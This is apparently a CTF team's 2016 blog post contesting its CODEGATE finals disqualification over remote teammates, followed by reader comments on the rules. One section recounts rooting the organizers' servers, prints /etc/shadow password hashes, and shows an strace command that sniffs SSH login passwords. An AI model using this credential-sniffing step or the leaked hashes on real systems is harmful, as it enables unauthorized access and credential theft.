CODEGATEgate

Final scoreboard as captured by l4w.io

Final Scoreboard as captured by manhluat (l4w)

TL;DR

CTF team LC↯BC has been banned and stripped of the first place at CODEGATE CTF 2016 Finals.

The fact has been announced after competition ended and even after they announced the winners. Disqualification decision was made in the most unprofessional and biased way possible, and the CTF organizers (Black Perl Security) and CODEGATE ignore our emails starting this week, so we are making it public to avoid gossip and speculation.

Also, there is a bit of technical details.

Timeline

    1. PPP 3570    2. LC↯BC 3440    3. 0daysober 2658
30 min before the end of CTF, we hold second place behind PPP. Distance to the first place is couple hundred points: we need any of the two remaining challenges to make it to the top.

T−10min. We submit hulkbox challenge to the gameboard, getting 1st.
    1. LC↯BC 3761    2. PPP 3570    3. 0daysober 2658

T−9min. CTF organizers’ team leader starts to demand aggressively to show him the exploit for the challenge. Task was pwned by one of us who couldn’t make it to Korea and was swapped with someone who could; the guy is asleep in Russia at the moment when the flag has been submitted (3:50 a.m. in UTC+3 timezone), so we propose to show orgs the exploit later once he’s up.

T=. CTF ends, organizers announce the winners. Press begins to interview us.

T+15min. Organizers interrupt the press session, make everyone leave except the teams. It is announced that one of teams was using remote assistance during the competition. A poll is thrown whether remote help is good or bad. “It’s good” 3 : 7 “it’s bad”

T+20min. It’s announced that LC↯BC is disqualified. Scoreboard shifts one row up. We ask why did we get disqualified. — Remote assistance. — But it’s not in the rules?? — It’s not in the rules, and you’re disqualified.
    1. PPP 3570    2. 0daysober 2658    3. 217 2632

T+30min. Orgas announce the winners: PPP, 0daysober, 217.

T+4days. None of our emails to either CODEGATE or CTF orgas get answered.

Fun bits

CODEGATE 2016 Final Rules

  • Rules don’t mention anything regarding remote players. We will not speculate whether other teams asked their folks who couldn’t come to Seoul for help, but since the voting result was 3 : 7, this rule was not an inherent knowledge. If it is forbidden and important to the point of taking away team’s result, rules should state it openly.
  • The orgas team leader circled at the PPP table, talking Korean in a low voice throughout the entire game. We know that sounds stupid, but that’s at least amusing. Made us even think orgas might be biased in their decision when we surpassed PPP. Now that the orgs don’t answer our attempts to communicate, they’re clearly not cooperative to us.
  • Last two hours the orgas stared at our displays assertively. Apart from that it’s pretty uncomfortable and breaks the focus when you try to RE, they totally had more than enough time to tell us if they didn’t like anything about us.
  • Well, we pwned the infrastructure.

    VMs that hosted the services were running this:
    Linux codegate 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
    which is a quarter-year old kernel vulnerable to this unpopular local privilege escalation strategy (shoutout to halfdog.net).

    We were able to get UID 0 on hackerlife and get free flag (which we didn’t submit until we pwned the challenge) as well as /etc/shadow as our trophy.
    codegate:$6$keSuElh.$t/C2mXZj5dKCfOIgGB0WGgP2aq6OwfR/m0PAI1gHAoAqZMwOErpDY7jPHwferwlxd3EFjHeQLdmy5/atDbcGi.:16917:0:99999:7:::
    hackerlife:$6$e9i/0OiN$yGSFlCXUkSaNmZiIY6qe9Ns12fdFJ.xiEiAnsIKa6etN2StNeYIWdqN59RtXvXUI1LRBc9dUw6uzI9NZon7ox1:16922:0:99999:7:::
    hackerlife_pwned:$6$HGrFrh2f$kZp3WZj7T3P6BsH4hLsyQJF8SazU723xt5PTXQRvbxb9M/5i5aBHSFIl6xqgJpsMggbiHH.IvUCsciqShZqvq.:16920:0:99999:7:::

    Some time later payload challenge was released, running the exact same kernel, so why not try escalating there too?
    codegate:$6$keSuElh.$t/C2mXZj5dKCfOIgGB0WGgP2aq6OwfR/m0PAI1gHAoAqZMwOErpDY7jPHwferwlxd3EFjHeQLdmy5/atDbcGi.:16917:0:99999:7:::
    g0est:$6$zajX8vRv$pFoFz2.0WcgzVxMQrvAAKuXzq2/9h4Gx.Z5w1HLizVFNh58GirRWSvrAtvlSptbueUCoZEbAZSEMrNNdGBYdw/:16923:0:99999:7:::
    payload:$6$JyY8yroK$row2/e4t/cH1y9MGDNNm6Qqv6bpBFedLNuqSt1vRjEk3EtV23cxBHSqjcH6T97D4mmtArLqFfNRAFKXNUMs2P.:16923:0:99999:7:::

    OK, this is interesting. codegate user has the exact same hash. Let’s attach strace to SSH server and wait for password to fly by in plaintext.
    root@codegate:/# strace -ff -p 17809 -e read |& fgrep ', "\f\0\0'
    [pid 17865] read(6, "\f\0\0\0\21qkqojrr******lek!", 22) = 22

    And yeah, it turns out that every game box does have a sudoer codegate account with the exact same password (which is qkqojrr******lek!). Game over!
    After paying a friendly visit to every vulnbox and scoreboard server, we stopped wasting time on this fun “side challenge” and proceeded to play as usual.

    Treat this as a fun piece.

Facts

  • LC↯BC had 4 people on-site and 2 remote connected via VPN.
  • On-site guys played 100% of the CTF time, remote guys joined and left at their leisure: no-one has free 20 hours during a workday.
  • LC↯BC got root privileges on every game server. No attempts were made to destabilize the infrastructure or ruin the fun of the game.
  • Security specialists who organize a CTF with eight-year history and 55K USD in prizes did:
    • use old Linux kernel version with a public exploit available;
    • use the same password for a sudo user on the entire infrastructure;
    • use passwords to access the servers;
    • spend their time on petty tyranny and annoying players.
  • Our solutions for all the tasks that we have submitted:
    https://www.dropbox.com/sh/oruwb6f7v6p4pdx/AACF0EE82_cfnV-JeMQbDOlea
  • /home/g0est/flag_tlqkf.txt from payload vulnbox that we have not submitted:
    PAYLOADISNOT_PAYLOADUNLOAD_}

Q & A

Questions related to rules of the competition:

Screenshot of the rules taken during competition

Q: Did LC↯BC submit write-up to CODEGATE organizer after the qualification?
A: Yes

Q: Did LC↯BC join both CODEGATE CTF 2016 and CODEGATE CTF Junior 2016?
A: No

Q: Did LC↯BC share the solution or key of any challenge while competition?
A: No

Q: Did LC↯BC attack operating server for everyone :)?
A: No

Q: Was there a rule effective regarding immediately showing your exploit to event organizer?
A: No

Q: Was there a rule effective regarding remote team members?
A: No

General questions

Q: Were there remote players playing for us?
A: Yes

Q: Were we warned before or during the game that remote help can lead to disqualification?
A: No

Q: Have we traded any flags with other teams or organizers?
A: Of course not!

Q: Have we compromised CTF infrastructure (server-side) ?
A: Yes

Q: Did we interfere with infrastructure in any way that ruins CTF gameplay for anyone?
A: No

Q: Did we have the ability to score every single flag available in the competition (incl. Junior CTF) ?
A: Yes

Q: Were all flags submitted to the scoreboard solved by LC↯BC in a proper way?
A: Yes
 

Hope this shares our vision reasonably and ends any rumors and conjectures about what happened to our team in Seoul this year. We’d like to add that CODEGATE organizers were friendly and helpful every year (we’re visiting the event for 6th year in a row), and hope to hear their vision of current situation.

Current stance of the orgas really does surprise and irritate us and makes us wonder what to expect from future CODEGATEs.

Guys, please don’t hide. We’re up to discuss it peacefully.

16 comments

Skip to comment form

  1. Hi guys,

    As a member of another CTF team which follows this case with interest, I would like to thank you for the official statement.

    A few follow-up questions if you don’t mind:

    1. Could you comment also on the general CODEGATE Hacking Competitions rules, stated at http://www.codegate.org/content/page/index.php?id=578?
    Especially point 5 which is:
    “In general competition, there is no limit number of players in qualification. However, more than 4 are not allowed in the finals.”

    2. Since the at-CTF rule set did not mention external players at all (i.e. it neither forbid them as you point out, nor did it explicitly allow them as e.g. was the case on DEF CON finals), did you get in touch with CODEGATE organizers to clarify this?

    Thanks!

    1. Thanks for commenting.

      1. We only looked at rules on gameboard during quals and finals — those are the ones on screenshot. They are different from your link, e.g. breakthrough points are somehow 30, 20, 10 which differs from what was awarded during the game (5, 3, 1). Maybe the ones on codegate.org are from previous years or smth.

      When you play a CTF, you look at stuff that’s published on the gameboard and on CTFtime. Our bad i guess, but there’s no way to learn about the other page from the stuff orgas gave us.

      2. Well yeah, still as a general principle, everything that is not in the rules is OK to do. Like the rules did not mention using qira or googling during the contest.

      1. Thank you for replying vos!

        Personally I would argue that unknown rules are unknown, i.e. not necessarily “allowed”, though for some cases (i.e. qira or google’ing you’ve mentioned) there is a safe-to-assume default. I not convinced if “external players allowed” would safely default to “yes” on a limited-number-of-people-onsite-final CTF, but that’s just my personal opinion.

        Kind regards,

          • Dor1s on May 7, 2016 at 14:51
          • Reply

          I wouldn’t say that default answer on external players allowance is “No” as well, since not every CTF has that rule (at least because it is hard to control if Internet access provided). DEF CON CTF organizers, for example, even clearly say that they don’t care how many people are playing, the only restriction <= 8 at the table.

          Obviously we won't tell that the task has been solved remotely, if we wouldn't 100% sure that it is not prohibited.

  2. Here are my thoughts about rules and building rules.

    There are two aspects to the orgas reaction.

    First: they banned a team for something that’s not in the rules.

    Rules don’t taboo using help from people who didn’t come to the finals. A ruleset creates expectations for the players: when the rules are bent by organizers, players don’t know what to expect (see rwth ctf on different issue but same rule management).

    There was no written rule. Since the voting turned out 3 : 7, the rule was also not obvious as a common knowledge, so if the thing is prohibited — organizers have to write about that 100% necessarily.

    Sometimes it happens that rules have a mistake. Nobody is safe. Such mistakes need to be fixed obligatorily — before the next event. Even in real life, where erroneous laws can be a catastrophe, when they fix the laws they always give some time to react to the changed rule. The law does not apply retroactively.

    There’s also this part of the argument whether it’s fine to use external help. If you talk about my opinion, i think LegitBS does it well: they say 8 persons at the table and we can’t control how many of you are in the cloud.

    In theory, you can set a rule about number of people involved, but it’s really hard to control and enforce. Also, it’s unclear where the borderline is:

    • own team members VPN into the game network
    • own team members get all the tasks and solve them
    • own team members consult on-site guys over Slack
    • own team members can be asked if you forgot how to do smth
    • google can be asked if you forgot how to do smth
    • internet is disabled

    Such a rule opens a huge ground for subjectivity, and that always sucks big time. That’s why i think they do it right on DEFCON.

     
    Second aspect is selective usage of the rules.

    In the end of the game, things were going this way: team submitted a flag, org asked to show exploit, team said that exploit is remote, org said team is banned for using remote.

    Let’s say we do have a rule established beforehand that prohibits remote backup. We need to enforce it somehow. They do it right on Quals: every team that wants to qualify has to send writeups (saying it once again, the rule is known in advance and teams are ready for it).

    Here orgs asked only one team to show the exploit code, and when team could not, it convinced orgs to ban them. Here we have an open field for subjectivity once again, and it begins to suck: how do we decide whom to ask for exploit? how do we decide if lack of exploit means anything bad? pwner could furiously RM the sploit once he pwned the task, — or ASLR could have matched luckily.

    Teams expect that solved tasks should be proven by flags, not by stable exploits.

    As one of our guys said, “Capture the Flag” != “Show me the Sploit”.

    A fair application of the rule would be at least to ask exploits for all the tasks from all the teams. You can not use the rules to cause inconvenience to some select people. Like in life, the law is same for everyone.

    • RoMaNSoFt on May 7, 2016 at 18:27
    • Reply

    Sorry to say this (I respect your team, you’re very good at CTFs and your writeups are very nice), but I cannot agree with you this time.

    IMHO, for *onsite* (with *limited* players) CTFs, “remote assistance” is (and has always been considered) *cheating*, I mean, it’s *implicitly* forbidden. No need to have a written rule specifying that, it’s simply very well known (more or less, I think Gynvael tried to state the very same but in a veeeery softer way :-))).

    Defcon CTF is the exception confirming the former rule (they have been ignoring people cheating in this way for years), but at least LegitBS tried to “fix” that situation by “legalizing” it: they’re now *explicitly* allowing remote help and even they explained why: basically because they can’t control neither avoid it (otherwise, I’m pretty sure they would forbid it too).

    Given said that, I won’t judge your ban, I wasn’t there at Seoul and perhaps I’m missing some other important points. Maybe other teams could have same or more remote assistance than you, who knows. Also, perhaps Org could have warned the teams beforehand instead of being quiet till the end of contest.

    1. Thanks for your support romansoft, i know you retweet our writeups frequently :) glad you enjoy them.

      What’s your opinion on my large comment above? If you call remote assistance cheating, where on that scale would you draw the line? What do you think about subjectivity / objectivity of such a rule?

      Because clearly if we try to forbid that, we can’t just ban teams who say they are using it, no-one would admit in their right mind. And since we’re dealing with hackers here, it’s pretty easy to hide

        • RoMaNSoFt on May 8, 2016 at 01:39
        • Reply

        Obviously, if you don’t get caught cheating (neither admit it!), you (or whoever) cannot be banned :) And I agree with you: it’s something pretty easy to hide. But there’s always a risk to get caught!

        Regarding the borderline, it’s always up to the organizers. For instance, previous Defcon CTF organizers were extremely permissive (basically allowing cheating; they even permitted 30+ ppl teams!!). Others could consider that a very small hint given by your remote buddy (which simply saved you 30 min time) is indeed a reason to ban your team. Etc. Strictly speaking, you are breaking the rule in both cases and you could be banned in both cases too. The only way to be safe for the ban is to fully comply with the rule by playing 100% fair.

        Anyway, the important matter is not where to draw the border line or how difficult is to get caugth: simply *play fair* with the rest of teams and don’t use remote help at all. Period. If all teams are honest and follow this ethics, there should be no problems/bans at all :)

  3. A small note from outside here.

    Well, probably the remote help could be *implicitly* prohibited, as Roman and Gynvael said, but come on, I’m pretty sure most of big (and even small) teams do it.

    At least everybody uses chats (or Slack, or whatever) for collaborating with all team members. Isn’t this a huge remote assistance? Someone can give you a hint which can save hours of pain and lead you to win.
    Even if there is no help, formally discussing tasks with remote members is cheating, right? =) Where’s the borderline, as vos asked?

    Thus, my guess is that PPP used remote help either. 99%. Same about those 3 of 7 teams who voted “It’s good”. So what? Why not checking the traffic and disqualifying those who violated this implicit rule?

    Orgas didn’t try to investigate or prevent it in any way. IMO you cannot just give everybody an opportunity to “cheat” and *force* afterwards one particular team to admit that.
    The fact that this particular team happened to be the winner makes this even more inappropriate.

    1. We won’t comment on the organizer’s decisions since that’s between LC↯BC and the organizers, and we have a conflict of interest. However, we do want to make it clear that PPP never uses help of any kind from outside teammates during in-person CTFs, unless it is ​explicitly permitted by the rules (e.g. at recent DEFCON CTFs). During in-person CTFs, we only discuss problems on a private chat channel restricted to the in-person team.

    2. “At least everybody uses chats (or Slack, or whatever) for collaborating with all team members. Isn’t this a huge remote assistance?”

      Whoa, that’s an interesting assumption to make. We (HackingForSoju) always set up private channels with only the people actually on-site and participating, when it’s an on-site final round of a CTF.

      Even in the event that we know that a certain off-site team member could have some useful input (even on a generic “factoid” level) for a certain challenge, we would not ask them for help.

      We have assumed that everyone is doing the same, unless remote players are explicitly allowed. When 3 out of 10 teams at the Codegate finals voted that they think getting assistance from third parties is fine, it really surprised us. It’s really sad to see that it’s apparently not that uncommon to play by a “different set of rules”..

      1. Hm, well, okay, I’ll ask somebody else from big teams about their experience on this issue.
        My team always was too small to have remote assistance (even didn’t have enough participants for on-site events), so my assumption about the rest may be biased. But I was almost sure in it.

        As of the LC/BC case, I guess this statement was released at all just because Orgas themselves confirmed and admitted that there was no rule regarding remote help, and the decision about disqualification was made on the fly.

        1. As has already been pointed out, the rule is mentioned here:

          http://www.codegate.org/content/page/index.php?id=578

          Honestly though, this is common knowledge among the CTF teams, especially for a team that has participated in Codegate a number of times before. I don’t read the rules for playing pool every time that I do, and I rarely read the rules before participating in a particular CTF.

          Pwning the CTF infrastructure as well as using remote players in on-site CTF:s are both examples of things that are almost always banned, and in the rare case it isn’t it will be clearly stated.

          Regarding Blackperl not mentioning this explicitly in their own rule page (cached version @ https://webcache.googleusercontent.com/search?q=cache:5wStGdQhHQcJ:codegate.bpsec.co.kr/rule), I can somewhat agree that this is an oversight from Blackperl’s side. Although, an oversight comparable to not explicitly have a “no cheating allowed” rule listed (especially since it is actually mentioned in the general Codegate rules).

          What I’m really curious about at the moment is what set of rules MSLC/LCBC/etc have been adhering to during previous years, and especially on the occasions where they have been among the top 3. Also, I’m still really curious about who the remaining two teams that voted “it’s good” were.

    • C on May 8, 2016 at 10:09
    • Reply

    I would consider any help from outside teammates to be cheating unless explicitly permitted. We also use private channels for any in-person CTF’s.

    Also, I think you should have been disqualified for getting root on the infrastructure and not reporting it. You have no reason to be running kernel exploits on the organizers machines.

    Personally, I wonder if you cheated for the hulkbox challenge. It seems really unlikely that your teammate sent you the flag and fell asleep immediately after. I wonder if the story is actually that you cheated for the flag and needed time to write an exploit.

    • strike on May 8, 2016 at 10:32
    • Reply

    first off, i don’t like remote playa ar finals. but this is only a personal opinion as a CTF player. i think there should have been at least these 2 rules.

    1. remote players are not allowed; since some CTFs don’t block remote players such as Defcon. even though many CTFs players would’t agree with their rule, Defcon CTF is a most famous one in this category, it’s not weird that some teams would see other CTFs following the same rule if one doesnt mention it’s not allowed.

    2. teams can be banned by a poll opened by the staff during the competition or after the competiton; this rule looks very strange to me if happened and there was no mention about this in the rule.

    • anonymous on May 10, 2016 at 00:18
    • Reply

    It seems you are saying: “our interpretation of the rules is correct. It is the organizers’ fault for having vague rules. We would do the same thing again, given the opportunity.”

    Is this correct?

Leave a Reply

Your email address will not be published.